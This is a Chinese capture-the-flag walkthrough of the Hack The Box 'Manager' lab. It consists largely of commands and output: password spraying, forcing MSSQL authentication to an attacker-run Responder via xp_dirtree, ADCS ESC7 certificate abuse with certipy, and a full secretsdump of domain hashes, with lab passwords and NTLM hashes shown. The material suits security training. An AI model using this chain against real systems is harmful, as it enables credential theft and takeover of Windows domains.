知识点:rid枚举用户密码喷射;mssql执行xp_dirtree探测敏感文件;ADCS-ESC7提权。
Scan
┌──(root㉿kali)-[/home/kali/Desktop/htb/manager]
└─# nmap -sC -sV -Pn 10.10.11.236
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-24 10:14 EDT
Nmap scan report for 10.10.11.236
Host is up (0.38s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Manager
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-10-24 19:39:02Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
|_ssl-date: 2023-10-24T19:40:39+00:00; +5h24m00s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
|_ssl-date: 2023-10-24T19:40:38+00:00; +5h24m01s from scanner time.
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-10-24T17:16:19
|_Not valid after: 2053-10-24T17:16:19
| ms-sql-info:
| 10.10.11.236:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
|_ssl-date: 2023-10-24T19:40:39+00:00; +5h24m01s from scanner time.
| ms-sql-ntlm-info:
| 10.10.11.236:1433:
| Target_Name: MANAGER
| NetBIOS_Domain_Name: MANAGER
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: manager.htb
| DNS_Computer_Name: dc01.manager.htb
| DNS_Tree_Name: manager.htb
|_ Product_Version: 10.0.17763
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
|_ssl-date: 2023-10-24T19:40:39+00:00; +5h23m59s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-10-24T19:40:38+00:00; +5h24m01s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-10-24T19:39:57
|_ start_date: N/A
|_clock-skew: mean: 5h23m59s, deviation: 1s, median: 5h23m59s
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 139.60 seconds
Enum
随便枚举一下
crackmapexec smb 10.10.11.236 -u guest -p '' --shares --rid-brute 10000
把user提取出来写入users.txt
Administrator
Guest
krbtgt
DC01$
Zhong
Cheng
Ryan
Raven
JinWoo
ChinHae
Operator
没有什么可利用的roasting,简单的把用户名作为密码(注意这里txt内需要修成小写)得operator
crackmapexec smb 10.10.11.236 -u users.txt -p users.txt --no-brute
#它不会尝试暴力破解,而只使用提供的用户名和密码进行尝试。
mssql
nmap扫描时看到mssql服务也开启了,也测一下,得operator
crackmapexec mssql 10.10.11.236 -u users.txt -p users.txt --no-brute
用impacket包下的工具进入mssql
impacket-mssqlclient manager.htb/operator:operator@10.10.11.236 -windows-auth
xp_dirtree
尝试了xp_cmdshell等,发现可以执行xp_dirtree,UNC获取的是DC$,正常来说这里保存到文件用john爆破,这里DC$的hash破解不出来:
python3 /usr/share/responder/Responder.py -I tun0 -i 10.10.14.92 -v
SQL> xp_dirtree "\10.10.14.92geqian"
没办法,继续用xp_dirtree翻目录,找到website-backup-27-07-23-old.zip
xp_dirtree 'C:inetpubwwwroot' ,0 ,1
# 0:这是深度参数,指定遍历目录的深度。0 表示只遍历指定目录本身,不包括其子目录。如果你想遍历子目录,可以使用 1。
# 1:这是文件类型参数,用于筛选要返回的文件类型。1 表示只返回文件,而不包括子目录。如果你想返回子目录,可以使用 0。
# 看到
website-backup-27-07-23-old.zip
这里刚好是web的根,直接访问http://10.10.11.236/website-backup-27-07-23-old.zip下载得xml文件里有密码
<ldap-conf xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<server>
<host>dc01.manager.htb</host>
<open-port enabled="true">389</open-port>
<secure-port enabled="false">0</secure-port>
<search-base>dc=manager,dc=htb</search-base>
<server-type>microsoft</server-type>
<access-user>
<user>[email protected]</user>
<password>R4v3nBe5tD3veloP3r!123</password>
</access-user>
<uid-attribute>cn</uid-attribute>
</server>
<search type="full">
<dir-list>
<dir>cn=Operator1,CN=users,dc=manager,dc=htb</dir>
</dir-list>
</search>
</ldap-conf>
得###
[email protected]
R4v3nBe5tD3veloP3r!123
user
Raven用户登录:
evil-winrm -i 10.10.11.236 -u raven -p 'R4v3nBe5tD3veloP3r!123'
发现raven在“Certificate Service DCOM Access”组中,就检查ADCS,发现ESC7:
whoami /all
certipy-ad find -vulnerable -stdout -u raven -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236
manager-DC01-CA
ADCS ESC7
跟着大佬文章慢慢做:https://github.com/ly4k/Certipy#esc7
# 如果您只有访问Manage CA权限,您可以Manage Certificates通过将您的用户添加为新官员来授予自己访问权限。
certipy-ad ca -ca 'manager-DC01-CA' -add-officer raven -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
# SubCA可以使用参数在 CA 上启用该模板-enable-template。默认情况下,SubCA模板已启用。
certipy-ad ca -ca 'manager-DC01-CA' -enable-template SubCA -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -debug
# 如果我们已经满足了这次攻击的先决条件,我们可以首先根据模板请求证书SubCA。
该请求将被拒绝,但我们将保存私钥并记下请求 ID。
┌──(root㉿kali)-[/home/kali/Desktop/htb/manager]
└─# certipy-ad req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target 10.10.11.236 -template SubCA -upn administrator@manager.htb
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 13
Would you like to save the private key? (y/N) y
[*] Saved private key to 13.key
[-] Failed to request certificate
# 通过我们的Manage CA和,我们可以使用命令和参数Manage Certificates发出失败的证书请求。ca-issue-request <request ID>
certipy-ad ca -ca 'manager-DC01-CA' -issue-request 13 -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
# 这一步如果报错Got access denied trying to issue certificate,再做一次第一步的add officer
# 最后,我们可以使用req命令和-retrieve <request ID>参数检索颁发的证书。
certipy-ad req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target 10.10.11.236 -retrieve 13
# ntpdate 的全称是 "Network Time Protocol Date and Time",用于域内时间同步。
# auth参数一般用于身份认证。
sudo ntpdate -s 10.10.11.236
certipy-ad auth -pfx ./administrator.pfx -dc-ip 10.10.11.236
完整流程:
┌──(root㉿kali)-[/home/kali/Desktop/htb/manager]
└─# certipy-ad ca -ca 'manager-DC01-CA' -enable-template SubCA -username [email protected] -password 'R4v3nBe5tD3veloP3r!123' -debug
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[+] Trying to resolve 'MANAGER.HTB' at '192.168.141.2'
[+] Resolved 'MANAGER.HTB' from cache: 10.10.11.236
[+] Trying to get DCOM connection for: 10.10.11.236
[+] Authenticating to LDAP server
[+] Bound to ldaps://10.10.11.236:636 - ssl
[+] Default path: DC=manager,DC=htb
[+] Configuration path: CN=Configuration,DC=manager,DC=htb
[*] Successfully enabled 'SubCA' on 'manager-DC01-CA'
┌──(root㉿kali)-[/home/kali/Desktop/htb/manager]
└─# certipy-ad req -username [email protected] -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target 10.10.11.236 -template SubCA -upn [email protected]
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 13
Would you like to save the private key? (y/N) y
[*] Saved private key to 13.key
[-] Failed to request certificate
┌──(root㉿kali)-[/home/kali/Desktop/htb/manager]
└─# certipy-ad ca -ca 'manager-DC01-CA' -issue-request 13 -username [email protected] -password 'R4v3nBe5tD3veloP3r!123'
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[-] Got access denied trying to issue certificate
┌──(root㉿kali)-[/home/kali/Desktop/htb/manager]
└─# certipy-ad ca -ca 'manager-DC01-CA' -add-officer raven -username [email protected] -password 'R4v3nBe5tD3veloP3r!123'
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Successfully added officer 'Raven' on 'manager-DC01-CA'
┌──(root㉿kali)-[/home/kali/Desktop/htb/manager]
└─# certipy-ad ca -ca 'manager-DC01-CA' -issue-request 13 -username [email protected] -password 'R4v3nBe5tD3veloP3r!123'
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Successfully issued certificate
┌──(root㉿kali)-[/home/kali/Desktop/htb/manager]
└─# certipy-ad req -username [email protected] -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target 10.10.11.236 -retrieve 13
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Rerieving certificate with ID 13
[*] Successfully retrieved certificate
[*] Got certificate with UPN '[email protected]'
[*] Certificate has no object SID
[*] Loaded private key from '13.key'
[*] Saved certificate and private key to 'administrator.pfx'
┌──(root㉿kali)-[/home/kali/Desktop/htb/manager]
└─# sudo ntpdate -s 10.10.11.236
┌──(root㉿kali)-[/home/kali/Desktop/htb/manager]
└─# certipy-ad auth -pfx ./administrator.pfx -dc-ip 10.10.11.236
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Using principal: [email protected]
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef
最后导出所有hash
┌──(kali㉿kali)-[~/Desktop/htb/manager]
└─$ impacket-secretsdump [email protected] -hashes :ae5064c2f62317332c88629e025924ef -just-dc-ntlm
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Dumping Domain Credentials (domainuid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b5edce70e6c1efa075f14bcf5231f79a:::
Zhong:1113:aad3b435b51404eeaad3b435b51404ee:7d148e27d43945dca3f9a9ae6cb93e47:::
Cheng:1114:aad3b435b51404eeaad3b435b51404ee:5f9fb454ca66927468e91362c391d4fb:::
Ryan:1115:aad3b435b51404eeaad3b435b51404ee:7f4e434796eeb1aa0c69630613dbc8a4:::
Raven:1116:aad3b435b51404eeaad3b435b51404ee:1635e153d4d6541a6367ec7a369d1fc7:::
JinWoo:1117:aad3b435b51404eeaad3b435b51404ee:43b026fc35e89627f2aed3420a1ff09b:::
ChinHae:1118:aad3b435b51404eeaad3b435b51404ee:bcc5893596907bc0672ee1a42f6b887b:::
Operator:1119:aad3b435b51404eeaad3b435b51404ee:e337e31aa4c614b2895ad684a51156df:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:452a4c05d648cefa2a173dbbcd2db654:::
[*] Cleaning up...
原文始发于微信公众号(搁浅安全):HTB-Manager(Medium)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论